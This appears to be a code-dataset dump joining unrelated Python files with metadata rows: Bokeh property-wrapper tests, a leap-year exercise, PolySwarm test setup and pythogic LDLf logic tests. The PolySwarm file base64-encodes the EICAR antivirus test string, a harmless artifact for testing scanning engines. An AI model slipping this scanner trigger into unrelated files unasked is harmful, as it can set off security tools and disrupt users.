assert mock_notify.call_count == 1
assert (mock_notify.call_args[0][0]['foo'] == np.array([10])).all()
assert 'hint' in mock_notify.call_args[1]
assert isinstance(mock_notify.call_args[1]['hint'], ColumnsStreamedEvent)
assert mock_notify.call_args[1]['hint'].setter == 'setter'
assert mock_notify.call_args[1]['hint'].rollover == None
@patch('bokeh.core.property.wrappers.PropertyValueContainer._notify_owners')
def test_PropertyValueColumnData__stream_list_with_rollover(mock_notify) -> None:
from bokeh.document.events import ColumnsStreamedEvent
source = ColumnDataSource(data=dict(foo=[10, 20, 30]))
pvcd = bcpw.PropertyValueColumnData(source.data)
mock_notify.reset_mock()
pvcd._stream("doc", source, dict(foo=[40]), rollover=3, setter="setter")
assert mock_notify.call_count == 1
assert mock_notify.call_args[0] == ({'foo': [20, 30, 40]},) # streaming to list, "old" is actually updated value
assert 'hint' in mock_notify.call_args[1]
assert isinstance(mock_notify.call_args[1]['hint'], ColumnsStreamedEvent)
assert mock_notify.call_args[1]['hint'].setter == 'setter'
assert mock_notify.call_args[1]['hint'].rollover == 3
@patch('bokeh.core.property.wrappers.PropertyValueContainer._notify_owners')
def test_PropertyValueColumnData__stream_array_to_array(mock_notify) -> None:
from bokeh.document.events import ColumnsStreamedEvent
import numpy as np
source = ColumnDataSource(data=dict(foo=np.array([10])))
pvcd = bcpw.PropertyValueColumnData(source.data)
mock_notify.reset_mock()
pvcd._stream("doc", source, dict(foo=[20]), setter="setter")
assert mock_notify.call_count == 1
assert len(mock_notify.call_args[0]) == 1
assert 'foo' in mock_notify.call_args[0][0]
assert (mock_notify.call_args[0][0]['foo'] == np.array([10])).all()
assert 'hint' in mock_notify.call_args[1]
assert isinstance(mock_notify.call_args[1]['hint'], ColumnsStreamedEvent)
assert mock_notify.call_args[1]['hint'].setter == 'setter'
assert mock_notify.call_args[1]['hint'].rollover == None
@patch('bokeh.core.property.wrappers.PropertyValueContainer._notify_owners')
def test_PropertyValueColumnData__stream_array_to_list(mock_notify) -> None:
from bokeh.document.events import ColumnsStreamedEvent
source = ColumnDataSource(data=dict(foo=[10]))
pvcd = bcpw.PropertyValueColumnData(source.data)
mock_notify.reset_mock()
pvcd._stream("doc", source, dict(foo=[20]), setter="setter")
assert mock_notify.call_count == 1
assert len(mock_notify.call_args[0]) == 1
assert 'foo' in mock_notify.call_args[0][0]
assert mock_notify.call_args[0] == ({'foo': [10, 20]},) # streaming to list, "old" is actually updated value
assert 'hint' in mock_notify.call_args[1]
assert isinstance(mock_notify.call_args[1]['hint'], ColumnsStreamedEvent)
assert mock_notify.call_args[1]['hint'].setter == 'setter'
assert mock_notify.call_args[1]['hint'].rollover == None
@patch('bokeh.core.property.wrappers.PropertyValueContainer._notify_owners')
def test_PropertyValueColumnData__stream_array_with_rollover(mock_notify) -> None:
from bokeh.document.events import ColumnsStreamedEvent
import numpy as np
source = ColumnDataSource(data=dict(foo=np.array([10, 20, 30])))
pvcd = bcpw.PropertyValueColumnData(source.data)
mock_notify.reset_mock()
pvcd._stream("doc", source, dict(foo=[40]), rollover=3, setter="setter")
assert mock_notify.call_count == 1
assert len(mock_notify.call_args[0]) == 1
assert 'foo' in mock_notify.call_args[0][0]
assert (mock_notify.call_args[0][0]['foo'] == np.array([10, 20, 30])).all()
assert 'hint' in mock_notify.call_args[1]
assert isinstance(mock_notify.call_args[1]['hint'], ColumnsStreamedEvent)
assert mock_notify.call_args[1]['hint'].setter == 'setter'
assert mock_notify.call_args[1]['hint'].rollover == 3
@patch('bokeh.core.property.wrappers.PropertyValueContainer._notify_owners')
def test_PropertyValueColumnData__patch_with_simple_indices(mock_notify) -> None:
from bokeh.document.events import ColumnsPatchedEvent
source = ColumnDataSource(data=dict(foo=[10, 20]))
pvcd = bcpw.PropertyValueColumnData(source.data)
mock_notify.reset_mock()
pvcd._patch("doc", source, dict(foo=[(1, 40)]), setter='setter')
assert mock_notify.call_count == 1
assert mock_notify.call_args[0] == ({'foo': [10, 40]},)
assert pvcd == dict(foo=[10, 40])
assert 'hint' in mock_notify.call_args[1]
assert isinstance(mock_notify.call_args[1]['hint'], ColumnsPatchedEvent)
assert mock_notify.call_args[1]['hint'].setter == 'setter'
@patch('bokeh.core.property.wrappers.PropertyValueContainer._notify_owners')
def test_PropertyValueColumnData__patch_with_repeated_simple_indices(mock_notify) -> None:
from bokeh.document.events import ColumnsPatchedEvent
source = ColumnDataSource(data=dict(foo=[10, 20]))
pvcd = bcpw.PropertyValueColumnData(source.data)
mock_notify.reset_mock()
pvcd._patch("doc", source, dict(foo=[(1, 40), (1, 50)]), setter='setter')
assert mock_notify.call_count == 1
assert mock_notify.call_args[0] == ({'foo': [10, 50]},)
assert pvcd == dict(foo=[10, 50])
assert 'hint' in mock_notify.call_args[1]
assert isinstance(mock_notify.call_args[1]['hint'], ColumnsPatchedEvent)
assert mock_notify.call_args[1]['hint'].setter == 'setter'
@patch('bokeh.core.property.wrappers.PropertyValueContainer._notify_owners')
def test_PropertyValueColumnData__patch_with_slice_indices(mock_notify) -> None:
from bokeh.document.events import ColumnsPatchedEvent
source = ColumnDataSource(data=dict(foo=[10, 20, 30, 40, 50]))
pvcd = bcpw.PropertyValueColumnData(source.data)
mock_notify.reset_mock()
pvcd._patch("doc", source, dict(foo=[(slice(2), [1,2])]), setter='setter')
assert mock_notify.call_count == 1
assert mock_notify.call_args[0] == ({'foo': [1, 2, 30, 40, 50]},)
assert pvcd == dict(foo=[1, 2, 30, 40, 50])
assert 'hint' in mock_notify.call_args[1]
assert isinstance(mock_notify.call_args[1]['hint'], ColumnsPatchedEvent)
assert mock_notify.call_args[1]['hint'].setter == 'setter'
@patch('bokeh.core.property.wrappers.PropertyValueContainer._notify_owners')
def test_PropertyValueColumnData__patch_with_overlapping_slice_indices(mock_notify) -> None:
from bokeh.document.events import ColumnsPatchedEvent
source = ColumnDataSource(data=dict(foo=[10, 20, 30, 40, 50]))
pvcd = bcpw.PropertyValueColumnData(source.data)
mock_notify.reset_mock()
pvcd._patch("doc", source, dict(foo=[(slice(2), [1,2]), (slice(1,3), [1000,2000])]), setter='setter')
assert mock_notify.call_count == 1
assert mock_notify.call_args[0] == ({'foo': [1, 1000, 2000, 40, 50]},)
assert pvcd == dict(foo=[1, 1000, 2000, 40, 50])
assert 'hint' in mock_notify.call_args[1]
assert isinstance(mock_notify.call_args[1]['hint'], ColumnsPatchedEvent)
assert mock_notify.call_args[1]['hint'].setter == 'setter'
@patch('bokeh.core.property.wrappers.PropertyValueContainer._notify_owners')
def test_PropertyValueList_mutators(mock_notify) -> None:
pvl = bcpw.PropertyValueList([10, 20, 30, 40, 50])
mock_notify.reset_mock()
del pvl[2]
assert mock_notify.called
# this exercises __delslice__ on Py2 but not Py3 which just
# uses __delitem__ and a slice index
mock_notify.reset_mock()
del pvl[1:2]
assert mock_notify.called
mock_notify.reset_mock()
pvl += [888]
assert mock_notify.called
mock_notify.reset_mock()
pvl *= 2
assert mock_notify.called
mock_notify.reset_mock()
pvl[0] = 2
assert mock_notify.called
# this exercises __setslice__ on Py2 but not Py3 which just
# uses __setitem__ and a slice index
mock_notify.reset_mock()
pvl[3:1:-1] = [21, 31]
assert mock_notify.called
mock_notify.reset_mock()
pvl.append(999)
assert mock_notify.called
mock_notify.reset_mock()
pvl.extend([1000])
assert mock_notify.called
mock_notify.reset_mock()
pvl.insert(0, 100)
assert mock_notify.called
mock_notify.reset_mock()
pvl.pop()
assert mock_notify.called
mock_notify.reset_mock()
pvl.remove(100)
assert mock_notify.called
mock_notify.reset_mock()
pvl.reverse()
assert mock_notify.called
mock_notify.reset_mock()
pvl.sort()
assert mock_notify.called
# OK, this is just to get a 100% test coverage inpy3 due to differences in
# py2 vs py2. The slice methods are only exist in py2. The tests above
# exercise all the cases, this just makes py3 report the non-py3 relevant
# code as covered.
try:
pvl.__setslice__(1,2,3)
except:
pass
try:
pvl.__delslice__(1,2)
except:
pass
def test_PropertyValueColumnData___copy__() -> None:
source = ColumnDataSource(data=dict(foo=[10]))
pvcd = source.data.__copy__()
assert source.data == pvcd
assert id(source.data) != id(pvcd)
pvcd['foo'][0] = 20
assert source.data['foo'][0] == 20
def test_PropertyValueColumnData___deepcopy__() -> None:
source = ColumnDataSource(data=dict(foo=[10]))
pvcd = source.data.__deepcopy__()
assert source.data == pvcd
assert id(source.data) != id(pvcd)
pvcd['foo'][0] = 20
assert source.data['foo'][0] == 10
def test_Property_wrap() -> None:
for x in (Bool, Int, Float, Complex, String, Enum, Color,
Regex, Seq, Tuple, Instance, Any, Interval, Either,
DashPattern, Size, Percent, Angle, MinMaxBounds):
for y in (0, 1, 2.3, "foo", None, (), [], {}):
r = x.wrap(y)
assert r == y
assert isinstance(r, type(y))
def test_List_wrap() -> None:
for y in (0, 1, 2.3, "foo", None, (), {}):
r = List.wrap(y)
assert r == y
assert isinstance(r, type(y))
r = List.wrap([1,2,3])
assert r == [1,2,3]
assert isinstance(r, bcpw.PropertyValueList)
r2 = List.wrap(r)
assert r is r2
def test_Dict_wrap() -> None:
for y in (0, 1, 2.3, "foo", None, (), []):
r = Dict.wrap(y)
assert r == y
assert isinstance(r, type(y))
r = Dict.wrap(dict(a=1, b=2))
assert r == dict(a=1, b=2)
assert isinstance(r, bcpw.PropertyValueDict)
r2 = Dict.wrap(r)
assert r is r2
def test_ColumnData_wrap() -> None:
for y in (0, 1, 2.3, "foo", None, (), []):
r = ColumnData.wrap(y)
assert r == y
assert isinstance(r, type(y))
r = ColumnData.wrap(dict(a=1, b=2))
assert r == dict(a=1, b=2)
assert isinstance(r, bcpw.PropertyValueColumnData)
r2 = ColumnData.wrap(r)
assert r is r2
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
Test___all__ = verify_all(bcpw, ALL)
| 36.934874 | 116 | 0.64547 | 2,187 | 17,581 | 4.984911 | 0.103338 | 0.128417 | 0.095028 | 0.102367 | 0.81031 | 0.802697 | 0.788663 | 0.769308 | 0.754082 | 0.713722 | 0 | 0.028558 | 0.1575 | 17,581 | 475 | 117 | 37.012632 | 0.707467 | 0.118935 | 0 | 0.589235 | 0 | 0 | 0.100919 | 0.064021 | 0 | 0 | 0 | 0 | 0.362606 | 1 | 0.070822 | false | 0.008499 | 0.05949 | 0.002833 | 0.133144 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
92fd6589e17abf1310e7b543cae7a6456d1e6b6d | 238 | py | Python | student-work/cassandradelieto/exercism/python/leap/leap.py | developerQuinnZ/this_will_work | 5587a9fd030b47f9df6514e45c887b6872d2a4a1 | [
"MIT"
] | null | null | null | student-work/cassandradelieto/exercism/python/leap/leap.py | developerQuinnZ/this_will_work | 5587a9fd030b47f9df6514e45c887b6872d2a4a1 | [
"MIT"
] | null | null | null | student-work/cassandradelieto/exercism/python/leap/leap.py | developerQuinnZ/this_will_work | 5587a9fd030b47f9df6514e45c887b6872d2a4a1 | [
"MIT"
] | null | null | null | #on every year that is evenly divisible by 4
#except every year that is evenly divisible by 100
#unless the year is also evenly divisible by 400
def is_leap_year(year):
return(year % 4 == 0 and (year % 100 != 0 or year % 400 == 0))
| 29.75 | 66 | 0.701681 | 44 | 238 | 3.75 | 0.477273 | 0.272727 | 0.309091 | 0.181818 | 0.387879 | 0.387879 | 0.387879 | 0 | 0 | 0 | 0 | 0.091398 | 0.218487 | 238 | 7 | 67 | 34 | 0.795699 | 0.584034 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 0.5 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 6 |
1301d0d0113cc2b732d5f53dbe0f4f4797d369a6 | 149 | py | Python | tests/__init__.py | polyswarm/microengine-webhooks-py | 708b936cb298e556e8c19cd6c02477c028e2ce89 | [
"MIT"
] | 3 | 2021-07-08T19:16:37.000Z | 2022-01-11T08:41:04.000Z | tests/__init__.py | polyswarm/microengine-webhooks-py | 708b936cb298e556e8c19cd6c02477c028e2ce89 | [
"MIT"
] | 1 | 2021-07-27T18:33:32.000Z | 2021-07-27T18:33:32.000Z | tests/__init__.py | polyswarm/microengine-webhooks-py | 708b936cb298e556e8c19cd6c02477c028e2ce89 | [
"MIT"
] | null | null | null | import base64
EICAR_STRING = base64.b64decode(
'WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCo='
)
| 24.833333 | 98 | 0.872483 | 7 | 149 | 18.428571 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.087591 | 0.080537 | 149 | 5 | 99 | 29.8 | 0.854015 | 0 | 0 | 0 | 0 | 0 | 0.61745 | 0.61745 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
1307c4ac00666f520833f1ca0359cf2b59432345 | 109,753 | py | Python | tests/test_ldlf_emptytraces.py | MarcoFavorito/pythogic | aaa74fec41fbf08d96371f62218c462e9a2b69e0 | [
"MIT"
] | 4 | 2018-02-21T10:43:55.000Z | 2018-04-13T07:55:04.000Z | tests/test_ldlf_emptytraces.py | marcofavorito/pythogic | aaa74fec41fbf08d96371f62218c462e9a2b69e0 | [
"MIT"
] | 34 | 2018-03-04T18:30:12.000Z | 2018-08-14T21:36:29.000Z | tests/test_ldlf_emptytraces.py | marcofavorito/pythogic | aaa74fec41fbf08d96371f62218c462e9a2b69e0 | [
"MIT"
] | 1 | 2018-03-04T18:27:57.000Z | 2018-03-04T18:27:57.000Z | import unittest
from pprint import pprint
from pythogic.ldlf_empty_traces.LDLf_EmptyTraces import LDLf_EmptyTraces
from pythogic.ltlf.semantics.FiniteTrace import FiniteTrace
from pythogic.base.Formula import AtomicFormula, Not, And, Or, PathExpressionUnion, PathExpressionSequence, \
PathExpressionStar, PathExpressionTest, PathExpressionEventually, Next, Until, PathExpressionAlways, TrueFormula, \
LogicalTrue, LogicalFalse, End, FalseFormula, LDLfLast
from pythogic.base.Alphabet import Alphabet
from pythogic.base.Symbol import Symbol
from pythogic.pl.PL import PL
from pythogic.base.utils import print_nfa, print_dfa, _to_pythomata_dfa, _to_pythomata_nfa
class TestLDLfEmptyTraces(unittest.TestCase):
"""Tests for `pythogic.ldlf_empty_traces` package."""
def setUp(self):
# Symbols
self.a_sym = Symbol("a")
self.b_sym = Symbol("b")
self.c_sym = Symbol("c")
# Propositions
self.a = AtomicFormula(self.a_sym)
self.b = AtomicFormula(self.b_sym)
self.c = AtomicFormula(self.c_sym)
# Propositionals
self.not_a = Not(self.a)
self.not_b = Not(self.b)
self.not_c = Not(self.c)
self.a_and_b = And(self.a, self.b)
self.a_and_c = And(self.a, self.c)
self.b_and_c = And(self.b, self.c)
self.abc = And(self.a, And(self.b, self.c))
self.b_or_c = Or(self.b, self.c)
self.a_or_b = Or(self.a, self.b)
self.not_abc = Not(And(self.a, And(self.b, self.c)))
### Path expression
# Tests
self.test_a = PathExpressionTest(self.a)
self.test_b = PathExpressionTest(self.b)
self.test_not_a = PathExpressionTest(self.not_a)
self.test_not_b = PathExpressionTest(self.not_b)
# Union
self.path_a_or_b = PathExpressionUnion(self.a, self.b)
self.path_b_or_c = PathExpressionUnion(self.b, self.c)
# Sequence
self.path_seq_a_and_b__a_and_c = PathExpressionSequence(self.a_and_b, self.a_and_c)
self.path_a_or_b__b_or_c = PathExpressionSequence(self.path_a_or_b, self.path_b_or_c)
# Stars
self.path_b_or_c_star = PathExpressionStar(self.path_b_or_c)
self.path_not_abc = PathExpressionStar(self.not_abc)
# Modal connective
self.eventually_propositional_a_and_b__a_and_c = PathExpressionEventually(self.a_and_b, self.a_and_c)
self.eventually_test_a__c = PathExpressionEventually(self.test_a, self.c)
self.eventually_test_a__b = PathExpressionEventually(self.test_a, self.b)
self.eventually_seq_a_and_b__a_and_c__not_c = PathExpressionEventually(self.path_seq_a_and_b__a_and_c,
self.not_c)
self.eventually_seq_a_and_b__a_and_c__c = PathExpressionEventually(self.path_seq_a_and_b__a_and_c, self.c)
self.eventually_b_or_c_star__b_and_c = PathExpressionEventually(self.path_b_or_c_star, self.b_and_c)
self.next_a_and_c = PathExpressionEventually(TrueFormula(), self.a_and_c)
self.liveness_b_and_c = PathExpressionEventually(PathExpressionStar(TrueFormula()), self.b_and_c)
self.liveness_abc = PathExpressionEventually(PathExpressionStar(TrueFormula()), self.abc)
self.always_true__a = PathExpressionAlways(PathExpressionStar(TrueFormula()), self.a)
self.always_true__b_or_c = PathExpressionAlways(PathExpressionStar(TrueFormula()), self.b_or_c)
self.alphabet = Alphabet({self.a_sym, self.b_sym, self.c_sym})
# Traces
self.ldlf = LDLf_EmptyTraces(self.alphabet)
self.trace_1_list = [
{self.a_sym, self.b_sym},
{self.a_sym, self.c_sym},
{self.a_sym, self.b_sym},
{self.a_sym, self.c_sym},
{self.b_sym, self.c_sym},
]
self.trace_1 = FiniteTrace(self.trace_1_list, self.alphabet)
def test_truth(self):
self.assertFalse(self.ldlf.truth(self.not_a, self.trace_1, 0))
self.assertTrue(self.ldlf.truth(self.not_a, self.trace_1, 4))
self.assertTrue(self.ldlf.truth(self.a_and_b, self.trace_1, 0))
self.assertFalse(self.ldlf.truth(self.a_and_b, self.trace_1, 1))
self.assertTrue(self.ldlf.truth(self.a_or_b, self.trace_1, 1))
self.assertTrue(self.ldlf.truth(Not(And(self.b, self.c)), self.trace_1, 0))
self.assertTrue(self.ldlf.truth(self.eventually_seq_a_and_b__a_and_c__not_c, self.trace_1, 0))
self.assertFalse(self.ldlf.truth(self.eventually_seq_a_and_b__a_and_c__not_c, self.trace_1, 1))
self.assertTrue(self.ldlf.truth(self.eventually_propositional_a_and_b__a_and_c, self.trace_1, 0))
self.assertFalse(self.ldlf.truth(self.eventually_test_a__c, self.trace_1, 0))
self.assertTrue(self.ldlf.truth(self.eventually_test_a__b, self.trace_1, 0))
self.assertTrue(self.ldlf.truth(self.eventually_seq_a_and_b__a_and_c__not_c, self.trace_1, 0))
self.assertFalse(self.ldlf.truth(self.eventually_seq_a_and_b__a_and_c__c, self.trace_1, 0))
self.assertTrue(self.ldlf.truth(self.next_a_and_c, self.trace_1, 0))
self.assertTrue(self.ldlf.truth(self.liveness_b_and_c, self.trace_1, 0))
self.assertFalse(self.ldlf.truth(self.liveness_abc, self.trace_1, 0))
self.assertFalse(self.ldlf.truth(self.always_true__a, self.trace_1, 0))
self.assertTrue(self.ldlf.truth(self.always_true__a, self.trace_1.segment(0, self.trace_1.length() - 1), 0))
self.assertTrue(self.ldlf.truth(self.always_true__b_or_c, self.trace_1, 0))
# self.assertTrue(self.ldlf.truth(self.always_not_abc__b_and_c, self.trace_1, 0))
# self.assertTrue(self.ldlf.truth(self.trace_1, 0, self.eventually_b_or_c_star__b_and_c))
class TestLDLfEmptyTracesIsFormula(TestLDLfEmptyTraces):
def test_is_formula_allowed_formulas(self):
tt = LogicalTrue()
and_tt = And(tt, tt)
and_ab = And(self.a, self.b)
test_tt = PathExpressionTest(tt)
eventually_atomic_tt = PathExpressionEventually(self.a, tt)
eventually_not_tt = PathExpressionEventually(Not(self.a), tt)
eventually_and_tt = PathExpressionEventually(and_ab, tt)
eventually_and_tt_error = PathExpressionEventually(And(self.a, AtomicFormula.fromName("d")), tt)
eventually_test_tt = PathExpressionEventually(test_tt, tt)
eventually_union_tt = PathExpressionEventually(PathExpressionUnion(test_tt, and_ab), tt)
eventually_sequence_tt = PathExpressionEventually(PathExpressionSequence(test_tt, and_ab), tt)
eventually_star_tt = PathExpressionEventually(PathExpressionSequence(test_tt, and_ab), tt)
self.assertTrue(self.ldlf.is_formula(tt))
self.assertTrue(self.ldlf.is_formula(Not(tt)))
self.assertTrue(self.ldlf.is_formula(and_tt))
self.assertTrue(self.ldlf.is_formula(eventually_atomic_tt))
self.assertTrue(self.ldlf.is_formula(eventually_not_tt))
self.assertTrue(self.ldlf.is_formula(eventually_and_tt))
# introduce a new symbol
self.assertFalse(self.ldlf.is_formula(eventually_and_tt_error))
self.assertTrue(self.ldlf.is_formula(eventually_test_tt))
self.assertTrue(self.ldlf.is_formula(eventually_sequence_tt))
self.assertTrue(self.ldlf.is_formula(eventually_union_tt))
self.assertTrue(self.ldlf.is_formula(eventually_star_tt))
def test_is_formula_allowed_formulas_combinations(self):
tt = LogicalTrue()
and_tt = And(tt, Not(tt))
and_ab = And(self.a, self.b)
complex_path = PathExpressionSequence(PathExpressionUnion(and_ab, PathExpressionStar(and_ab)),
PathExpressionTest(PathExpressionEventually(and_ab, tt)))
complex_eventually = PathExpressionEventually(complex_path, and_tt)
self.assertTrue(self.ldlf.is_formula(complex_eventually))
def test_is_formula_derived_formulas(self):
tt = LogicalTrue()
and_tt = And(tt, tt)
and_ab = And(self.a, self.b)
eventually_test_tt = PathExpressionEventually(PathExpressionTest(self.a), tt)
eventually_test_tt_error = PathExpressionEventually(PathExpressionTest(AtomicFormula.fromName("d")), tt)
self.assertTrue(self.ldlf.is_formula(LogicalFalse()))
self.assertTrue(self.ldlf.is_formula(Or(tt, tt)))
self.assertTrue(self.ldlf.is_formula(Next(tt)))
self.assertTrue(self.ldlf.is_formula(Until(Next(tt), tt)))
self.assertTrue(self.ldlf.is_formula(Until(Next(tt), tt)))
self.assertTrue(self.ldlf.is_formula(End()))
self.assertTrue(self.ldlf.is_formula(PathExpressionAlways(and_ab, and_tt)))
self.assertTrue(self.ldlf.is_formula(PathExpressionAlways(TrueFormula(), and_tt)))
self.assertTrue(self.ldlf.is_formula(PathExpressionAlways(FalseFormula(), and_tt)))
self.assertTrue(self.ldlf.is_formula(LDLfLast()))
# a propositional is not an elementary formula
self.assertTrue(self.ldlf.is_formula(and_ab))
self.assertFalse(self.ldlf.is_formula(And(self.a, AtomicFormula.fromName("d"))))
# a propositional is not an elementary formula, neither in the Test expression
self.assertTrue(self.ldlf.is_formula(eventually_test_tt))
self.assertFalse(self.ldlf.is_formula(eventually_test_tt_error))
class TestLDLfEmptyTracesExpandFormula(TestLDLfEmptyTraces):
def test_expand_formula_allowed_formula(self):
"""Expansion of elementary formula should return the same formula."""
tt = LogicalTrue()
and_tt = And(tt, tt)
and_ab = And(self.a, self.b)
test_tt = PathExpressionTest(tt)
eventually_atomic_tt = PathExpressionEventually(self.a, tt)
eventually_not_tt = PathExpressionEventually(Not(self.a), tt)
eventually_and_tt = PathExpressionEventually(and_ab, tt)
eventually_and_tt_error = PathExpressionEventually(And(self.a, AtomicFormula.fromName("d")), tt)
eventually_test_tt = PathExpressionEventually(test_tt, tt)
eventually_union_tt = PathExpressionEventually(PathExpressionUnion(test_tt, and_ab), tt)
eventually_sequence_tt = PathExpressionEventually(PathExpressionSequence(test_tt, and_ab), tt)
eventually_star_tt = PathExpressionEventually(PathExpressionSequence(test_tt, and_ab), tt)
self.assertEqual(self.ldlf.expand_formula(tt), tt)
self.assertEqual(self.ldlf.expand_formula(Not(tt)), Not(tt))
self.assertEqual(self.ldlf.expand_formula(and_tt), and_tt)
self.assertEqual(self.ldlf.expand_formula(eventually_atomic_tt), eventually_atomic_tt)
self.assertEqual(self.ldlf.expand_formula(eventually_not_tt), eventually_not_tt)
self.assertEqual(self.ldlf.expand_formula(eventually_and_tt), eventually_and_tt)
# introduce a new symbol. Notice: it does not throw error
self.assertEqual(self.ldlf.expand_formula(eventually_and_tt_error), eventually_and_tt_error)
self.assertEqual(self.ldlf.expand_formula(eventually_test_tt), eventually_test_tt)
self.assertEqual(self.ldlf.expand_formula(eventually_sequence_tt), eventually_sequence_tt)
self.assertEqual(self.ldlf.expand_formula(eventually_union_tt), eventually_union_tt)
self.assertEqual(self.ldlf.expand_formula(eventually_star_tt), eventually_star_tt)
def test_expand_formula_derived_formula(self):
tt = LogicalTrue()
and_ab = And(self.a, self.b)
eventually_test_tt = PathExpressionEventually(PathExpressionTest(self.a), tt)
expanded_logicalFalse = Not(tt)
# expanded_falseformula = And(Not(DUMMY_ATOMIC), DUMMY_ATOMIC)
# expanded_trueformula = Not(And(Not(DUMMY_ATOMIC), DUMMY_ATOMIC))
expanded_falseformula = FalseFormula()
expanded_trueformula = TrueFormula()
expanded_end = Not(PathExpressionEventually(expanded_trueformula, Not(expanded_logicalFalse)))
expanded_last = PathExpressionEventually(expanded_trueformula, expanded_end)
expanded_eventually_test_tt = PathExpressionEventually(PathExpressionTest(PathExpressionEventually(self.a, tt)),
tt)
always_ = PathExpressionAlways(and_ab, tt)
next_ = Next(tt)
until_ = Until(tt, tt)
expanded_always_ = Not(PathExpressionEventually(and_ab, Not(tt)))
expanded_next_ = PathExpressionEventually(expanded_trueformula, And(tt, Not(expanded_end)))
expanded_until = PathExpressionEventually(
PathExpressionStar(PathExpressionSequence(PathExpressionTest(tt), expanded_trueformula)),
And(tt, Not(expanded_end))
)
self.assertEqual(self.ldlf.expand_formula(LogicalFalse()), expanded_logicalFalse)
self.assertEqual(self.ldlf.expand_formula(Or(tt, tt)), Not(And(Not(tt), Not(tt))))
self.assertEqual(self.ldlf.expand_formula(always_), expanded_always_)
self.assertEqual(self.ldlf.expand_formula(PathExpressionEventually(TrueFormula(), tt)),PathExpressionEventually(expanded_trueformula, tt))
self.assertEqual(self.ldlf.expand_formula(PathExpressionEventually(FalseFormula(), tt)),PathExpressionEventually(expanded_falseformula, tt))
self.assertEqual(self.ldlf.expand_formula(PathExpressionEventually(TrueFormula(), End())),PathExpressionEventually(expanded_trueformula, expanded_end))
self.assertEqual(self.ldlf.expand_formula(LDLfLast()), expanded_last)
self.assertEqual(self.ldlf.expand_formula(next_), expanded_next_)
self.assertEqual(self.ldlf.expand_formula(until_), expanded_until)
# a propositional is not an elementary formula
self.assertEqual(self.ldlf.expand_formula(and_ab), PathExpressionEventually(and_ab, tt))
# a propositional is not an elementary formula, neither in the Test expression
self.assertEqual(self.ldlf.expand_formula(eventually_test_tt), expanded_eventually_test_tt)
class TestLDLfEmptyTracesToNNF(TestLDLfEmptyTraces):
def test_to_nnf_allowed_formulas(self):
tt = LogicalTrue()
ff = LogicalFalse()
and_tt = And(tt, tt)
and_ab = And(self.a, self.b)
test_tt = PathExpressionTest(tt)
eventually_atomic_tt = PathExpressionEventually(self.a, tt)
eventually_not_tt = PathExpressionEventually(Not(self.a), tt)
eventually_and_tt = PathExpressionEventually(and_ab, tt)
eventually_and_tt_error = PathExpressionEventually(And(self.a, AtomicFormula.fromName("d")), tt)
eventually_test_tt = PathExpressionEventually(test_tt, tt)
eventually_union_tt = PathExpressionEventually(PathExpressionUnion(test_tt, and_ab), tt)
eventually_sequence_tt = PathExpressionEventually(PathExpressionSequence(test_tt, and_ab), tt)
eventually_star_tt = PathExpressionEventually(PathExpressionSequence(test_tt, and_ab), tt)
self.assertEqual(self.ldlf.to_nnf(tt), tt)
self.assertEqual(self.ldlf.to_nnf(Not(tt)), ff)
self.assertEqual(self.ldlf.to_nnf(Not(and_tt)), Or(ff, ff))
self.assertEqual(self.ldlf.to_nnf(eventually_atomic_tt), eventually_atomic_tt)
self.assertEqual(self.ldlf.to_nnf(eventually_not_tt), eventually_not_tt)
self.assertEqual(self.ldlf.to_nnf(eventually_and_tt), eventually_and_tt)
self.assertEqual(self.ldlf.to_nnf(eventually_test_tt), eventually_test_tt)
self.assertEqual(self.ldlf.to_nnf(eventually_sequence_tt), eventually_sequence_tt)
self.assertEqual(self.ldlf.to_nnf(eventually_union_tt), eventually_union_tt)
self.assertEqual(self.ldlf.to_nnf(eventually_star_tt), eventually_star_tt)
with self.assertRaises(ValueError):
# introduce a new symbol. Throws an error
self.ldlf.to_nnf(eventually_and_tt_error)
def test_to_nnf_derived_formulas(self):
tt = LogicalTrue()
ff = LogicalFalse()
and_ab = And(self.a, self.b)
eventually_test_tt = PathExpressionEventually(PathExpressionTest(self.a), tt)
# to_nnf_trueformula = Or(Not(DUMMY_ATOMIC), DUMMY_ATOMIC)
# to_nnf_false_formula = And(Not(DUMMY_ATOMIC), DUMMY_ATOMIC)
to_nnf_trueformula = TrueFormula()
to_nnf_false_formula = FalseFormula()
to_nnf_end = PathExpressionAlways(to_nnf_trueformula, ff)
to_nnf_not_end = PathExpressionEventually(to_nnf_trueformula, tt)
to_nnf_last = PathExpressionEventually(to_nnf_trueformula, to_nnf_end)
to_nnf_not_last = PathExpressionAlways(to_nnf_trueformula, to_nnf_not_end)
to_nnf_eventually_test_tt = PathExpressionEventually(PathExpressionTest(PathExpressionEventually(self.a, tt)),
tt)
always_ = PathExpressionAlways(and_ab, tt)
not_always_ = PathExpressionEventually(and_ab, ff)
next_ = Next(tt)
until_ = Until(tt, tt)
to_nnf_next_ = PathExpressionEventually(to_nnf_trueformula, And(tt, to_nnf_not_end))
